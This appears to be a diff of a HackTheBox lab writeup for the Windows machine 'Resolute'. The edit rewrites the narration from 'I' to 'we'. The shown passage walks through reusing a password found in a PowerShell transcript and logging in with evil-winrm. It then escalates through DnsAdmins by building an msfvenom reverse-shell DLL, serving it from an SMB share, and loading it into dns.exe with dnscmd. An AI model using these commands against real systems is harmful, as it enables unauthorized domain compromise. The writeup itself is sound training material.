chdav/hackthebox-writeups/machines/Windows/Resolute/README.md

 ![](images/foothold.png)

-Once in, I find the user flag on melanie’s desktop.
+Once in, we find the user flag on melanie’s desktop.

 ![](images/user-flag.png)

 ## Root Flag

-Next, I need to escalate privileges.
-I start looking around the file system, seeing if anything stands out.
-I soon find a PowerShell log within the directory `C:\PSTranscripts\20191203` that may contain something of interest.
+Next, we need to escalate privileges.
+We'll start looking around the file system, seeing if anything stands out.
+We find a PowerShell log within the directory `C:\PSTranscripts\20191203` that may contain something of interest.

 ```powershell
 > type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
 ```

-Within this transcript is a password for the user ryan.
-Additionally, the password may imply that ryan has some level of administrative privileges.
+Within this transcript is a password for the user `ryan`.
+Additionally, the password may imply that `ryan` has some level of administrative privileges.

 ![](images/passwd.png)

-Using my newly attained credentials, I log in as Ryan using `evil-winrm`.
+Using our newly attained credentials, we'll log in as `ryan` using `evil-winrm`.

 ```bash
 $ evil-winrm -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!'
 ```

-On ryan’s desktop there is a note that indicates that all changes are reverted within a minute.
-I’ll keep that in mind as I continue.
+On ryan’s desktop there is a note that indicates that all changes are reverted within a minute. we’ll keep that in mind as we continue.

 ![](images/note.png)

-Next, I want to see if ryan has any unique privileges.
-I use `net user` and can see that ryan is in the `Contractors` group.
-This indicates to me that he may have administrator rights.
-Because _Resolute_ also has DNS enabled, I can assume that ryan is also a DNS Admin or has write privileges to the DNS server object.
+Next, we want to see if `ryan` has any unique privileges.
+We'll use `net user` and can see that `ryan` is in the `Contractors` group.
+This indicates to us that the user may have administrator rights.
+Because _Resolute_ also has DNS enabled, we can assume that `ryan` is also a DNS Admin or has write privileges to the DNS server object.

 ```powershell
 > net user ryan /domain
 Global Group memberships     *Domain Users         *Contractors
 ```

 [This article](https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2) has a great write-up on how to abuse a DNS Admin account to escalate privileges.
-For brevity, I will inject a poisoned DLL into the DNS executable, which will create a SYSTEM-level shell when the DNS process is restarted.
+For brevity, we will inject a poisoned DLL into the DNS executable, which will create a SYSTEM-level shell when the DNS process is restarted.

-Using msfvenom, I will create the malicious DLL payload.
+Using msfvenom, we will create the malicious DLL payload.

 ```bash
 $ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.234 LPORT=4444 -f dll > privesc.dll
 ```

-I set up a listener as well, in preparation for the reverse shell.
+We'll set up a listener as well, in preparation for the reverse shell.

 ```bash
 $ nc -lvnp 4444
 ```

-Now I need to get my payload onto the machine.
-I choose to host the payload on my machine using `smbserver.py` from [impacket](https://github.com/SecureAuthCorp/impacket).
+Now we need to get our payload onto the machine.
+We'll choose to host the payload on my machine using `smbserver.py` from [impacket](https://github.com/SecureAuthCorp/impacket).

 ```bash
 $ sudo python smbserver.py share ./
 ```

-On the _Resolute_ box, I run the command to retrieve my poisoned DLL and inject it into `dns.exe`.
+On the _Resolute_ box, we'll run the command to retrieve our poisoned DLL and inject it into `dns.exe`.

 ```powershell
 > dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.234\share\privesc.dll
 ```

-Finally, I restart DNS.
+Finally, we'll restart DNS.
 This needs to be done relatively quickly to avoid changes being reverted.

 ```powershell
 > sc.exe stop dns